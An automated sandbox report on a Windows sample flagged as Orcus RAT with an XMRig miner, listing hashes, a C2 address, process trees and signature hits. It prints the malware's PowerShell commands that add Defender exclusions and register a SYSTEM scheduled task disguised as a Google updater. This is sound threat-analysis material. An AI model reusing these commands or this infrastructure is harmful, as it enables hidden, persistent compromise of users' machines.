Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 14:41
Static task
static1
Behavioral task
behavioral1
Sample
9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe
Resource
win7-20230220-en
General
-
Target
9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe
-
Size
4.4MB
-
MD5
b3c049b9160e55f747cf584b109aa3a2
-
SHA1
7731a49d69b16377c0acf234fa037278bc741923
-
SHA256
9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c
-
SHA512
1529775e6332b382331bc95b0b5c8a56f9aa79df6b1df9253782bcca1928956e88dba82d988e9544f9b610c15b0f108e50d22cecaa60b0fa79da135a74e866a4
-
SSDEEP
98304:AW1+5Ax7m35LZqTXrzxRERF+jtHPudaucpm1COO9lXf6Wnlgb4:AW1Gl3pZqLr1dVv/vf3y
Malware Config
Extracted
orcus
Puppet
distance-deutsche.at.ply.gg:10569
06e5544d890f4631b9b64b2e4d98f88b
-
autostart_method
Registry
-
enable_keylogger
false
-
install_path
%programfiles%\Recorder\VideoRecorder.exe
-
reconnect_delay
10000
-
registry_keyname
svcghost
-
taskscheduler_taskname
svcghost
-
watchdog_path
AppData\svchost.exe
Signatures
-
Orcus main payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\conhost.exe family_orcus C:\Users\Admin\AppData\Local\conhost.exe family_orcus C:\Users\Admin\AppData\Local\conhost.exe family_orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe family_orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe family_orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe family_orcus -
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
Processes:
svchost.exeab.exedescription pid process target process PID 4600 created 2576 4600 svchost.exe Explorer.EXE PID 4600 created 2576 4600 svchost.exe Explorer.EXE PID 4600 created 2576 4600 svchost.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE PID 1132 created 2576 1132 ab.exe Explorer.EXE -
Orcurs Rat Executable 7 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\conhost.exe orcus C:\Users\Admin\AppData\Local\conhost.exe orcus C:\Users\Admin\AppData\Local\conhost.exe orcus behavioral2/memory/4092-151-0x00000000009F0000-0x0000000000AD8000-memory.dmp orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe orcus C:\Program Files (x86)\Recorder\VideoRecorder.exe orcus -
XMRig Miner payload 25 IoCs
Processes:
resource yara_rule behavioral2/memory/1392-311-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-312-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-315-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-316-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-317-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/1392-319-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-320-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-322-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-323-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-326-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-327-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-332-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-333-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-335-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-336-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-338-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-339-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-341-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-342-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-344-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-345-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-347-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-352-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig behavioral2/memory/1392-354-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp xmrig behavioral2/memory/4892-355-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.execonhost.exeVideoRecorder.exesvchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation VideoRecorder.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 7 IoCs
Processes:
conhost.exesvchost.exeVideoRecorder.exeVideoRecorder.exesvchost.exesvchost.exeab.exepid process 4092 conhost.exe 4600 svchost.exe 532 VideoRecorder.exe 1896 VideoRecorder.exe 3680 svchost.exe 4912 svchost.exe 1132 ab.exe -
Processes:
resource yara_rule behavioral2/memory/1392-311-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-312-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-315-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-316-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-317-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/1392-319-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-320-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-322-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-323-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-326-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-327-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-332-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-333-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-335-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-336-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-338-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-339-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-341-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-342-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-344-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-345-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-347-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-352-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx behavioral2/memory/1392-354-0x00007FF6D5340000-0x00007FF6D5B34000-memory.dmp upx behavioral2/memory/4892-355-0x00007FF65D650000-0x00007FF65DE44000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
VideoRecorder.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svcghost = "\"C:\\Program Files (x86)\\Recorder\\VideoRecorder.exe\"" VideoRecorder.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
ab.exedescription pid process target process PID 1132 set thread context of 4732 1132 ab.exe conhost.exe PID 1132 set thread context of 1392 1132 ab.exe svchost.exe PID 1132 set thread context of 4892 1132 ab.exe conhost.exe -
Drops file in Program Files directory 7 IoCs
Processes:
cmd.execonhost.exesvchost.exeab.execmd.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files (x86)\Recorder\VideoRecorder.exe conhost.exe File opened for modification C:\Program Files (x86)\Recorder\VideoRecorder.exe conhost.exe File created C:\Program Files (x86)\Recorder\VideoRecorder.exe.config conhost.exe File created C:\Program Files\Google\Chrome\ab.exe svchost.exe File created C:\Program Files\Google\Libs\WR64.sys ab.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
svchost.exeVideoRecorder.exesvchost.exepowershell.exepowershell.exepowershell.exepid process 4912 svchost.exe 4912 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 4912 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 4912 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 4912 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 4600 svchost.exe 4600 svchost.exe 4700 powershell.exe 4700 powershell.exe 4912 svchost.exe 532 VideoRecorder.exe 532 VideoRecorder.exe 4912 svchost.exe 4600 svchost.exe 4600 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 1708 powershell.exe 1708 powershell.exe 532 VideoRecorder.exe 4912 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4600 svchost.exe 4600 svchost.exe 4912 svchost.exe 532 VideoRecorder.exe 3468 powershell.exe 3468 powershell.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe 4912 svchost.exe 532 VideoRecorder.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
VideoRecorder.exesvchost.exesvchost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 532 VideoRecorder.exe Token: SeDebugPrivilege 3680 svchost.exe Token: SeDebugPrivilege 4912 svchost.exe Token: SeDebugPrivilege 4700 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeIncreaseQuotaPrivilege 1708 powershell.exe Token: SeSecurityPrivilege 1708 powershell.exe Token: SeTakeOwnershipPrivilege 1708 powershell.exe Token: SeLoadDriverPrivilege 1708 powershell.exe Token: SeSystemProfilePrivilege 1708 powershell.exe Token: SeSystemtimePrivilege 1708 powershell.exe Token: SeProfSingleProcessPrivilege 1708 powershell.exe Token: SeIncBasePriorityPrivilege 1708 powershell.exe Token: SeCreatePagefilePrivilege 1708 powershell.exe Token: SeBackupPrivilege 1708 powershell.exe Token: SeRestorePrivilege 1708 powershell.exe Token: SeShutdownPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeSystemEnvironmentPrivilege 1708 powershell.exe Token: SeRemoteShutdownPrivilege 1708 powershell.exe Token: SeUndockPrivilege 1708 powershell.exe Token: SeManageVolumePrivilege 1708 powershell.exe Token: 33 1708 powershell.exe Token: 34 1708 powershell.exe Token: 35 1708 powershell.exe Token: 36 1708 powershell.exe Token: SeIncreaseQuotaPrivilege 1708 powershell.exe Token: SeSecurityPrivilege 1708 powershell.exe Token: SeTakeOwnershipPrivilege 1708 powershell.exe Token: SeLoadDriverPrivilege 1708 powershell.exe Token: SeSystemProfilePrivilege 1708 powershell.exe Token: SeSystemtimePrivilege 1708 powershell.exe Token: SeProfSingleProcessPrivilege 1708 powershell.exe Token: SeIncBasePriorityPrivilege 1708 powershell.exe Token: SeCreatePagefilePrivilege 1708 powershell.exe Token: SeBackupPrivilege 1708 powershell.exe Token: SeRestorePrivilege 1708 powershell.exe Token: SeShutdownPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeSystemEnvironmentPrivilege 1708 powershell.exe Token: SeRemoteShutdownPrivilege 1708 powershell.exe Token: SeUndockPrivilege 1708 powershell.exe Token: SeManageVolumePrivilege 1708 powershell.exe Token: 33 1708 powershell.exe Token: 34 1708 powershell.exe Token: 35 1708 powershell.exe Token: 36 1708 powershell.exe Token: SeIncreaseQuotaPrivilege 1708 powershell.exe Token: SeSecurityPrivilege 1708 powershell.exe Token: SeTakeOwnershipPrivilege 1708 powershell.exe Token: SeLoadDriverPrivilege 1708 powershell.exe Token: SeSystemProfilePrivilege 1708 powershell.exe Token: SeSystemtimePrivilege 1708 powershell.exe Token: SeProfSingleProcessPrivilege 1708 powershell.exe Token: SeIncBasePriorityPrivilege 1708 powershell.exe Token: SeCreatePagefilePrivilege 1708 powershell.exe Token: SeBackupPrivilege 1708 powershell.exe Token: SeRestorePrivilege 1708 powershell.exe Token: SeShutdownPrivilege 1708 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeSystemEnvironmentPrivilege 1708 powershell.exe Token: SeRemoteShutdownPrivilege 1708 powershell.exe Token: SeUndockPrivilege 1708 powershell.exe Token: SeManageVolumePrivilege 1708 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
VideoRecorder.exepid process 532 VideoRecorder.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
VideoRecorder.exepid process 532 VideoRecorder.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.execonhost.exeVideoRecorder.exesvchost.exepowershell.exeab.execmd.exedescription pid process target process PID 3756 wrote to memory of 4092 3756 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe conhost.exe PID 3756 wrote to memory of 4092 3756 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe conhost.exe PID 3756 wrote to memory of 4092 3756 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe conhost.exe PID 3756 wrote to memory of 4600 3756 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe svchost.exe PID 3756 wrote to memory of 4600 3756 9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe svchost.exe PID 4092 wrote to memory of 532 4092 conhost.exe VideoRecorder.exe PID 4092 wrote to memory of 532 4092 conhost.exe VideoRecorder.exe PID 4092 wrote to memory of 532 4092 conhost.exe VideoRecorder.exe PID 532 wrote to memory of 3680 532 VideoRecorder.exe svchost.exe PID 532 wrote to memory of 3680 532 VideoRecorder.exe svchost.exe PID 532 wrote to memory of 3680 532 VideoRecorder.exe svchost.exe PID 3680 wrote to memory of 4912 3680 svchost.exe svchost.exe PID 3680 wrote to memory of 4912 3680 svchost.exe svchost.exe PID 3680 wrote to memory of 4912 3680 svchost.exe svchost.exe PID 3468 wrote to memory of 2252 3468 powershell.exe schtasks.exe PID 3468 wrote to memory of 2252 3468 powershell.exe schtasks.exe PID 1132 wrote to memory of 4732 1132 ab.exe conhost.exe PID 1008 wrote to memory of 2180 1008 cmd.exe WMIC.exe PID 1008 wrote to memory of 2180 1008 cmd.exe WMIC.exe PID 1132 wrote to memory of 1392 1132 ab.exe svchost.exe PID 1132 wrote to memory of 4892 1132 ab.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe"C:\Users\Admin\AppData\Local\Temp\9a938f47030e9b34dcee96382fae40ed2f980299e1ced3a04c19c859b24ae40c.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Users\Admin\AppData\Local\conhost.exe"C:\Users\Admin\AppData\Local\conhost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Program Files (x86)\Recorder\VideoRecorder.exe"C:\Program Files (x86)\Recorder\VideoRecorder.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe" /launchSelfAndExit "C:\Program Files (x86)\Recorder\VideoRecorder.exe" 532 /protectFile5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe" /watchProcess "C:\Program Files (x86)\Recorder\VideoRecorder.exe" 532 "/protectFile"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qcoya#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\ab.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ab.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\ab.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kfqwhwv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\ab.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4572 -
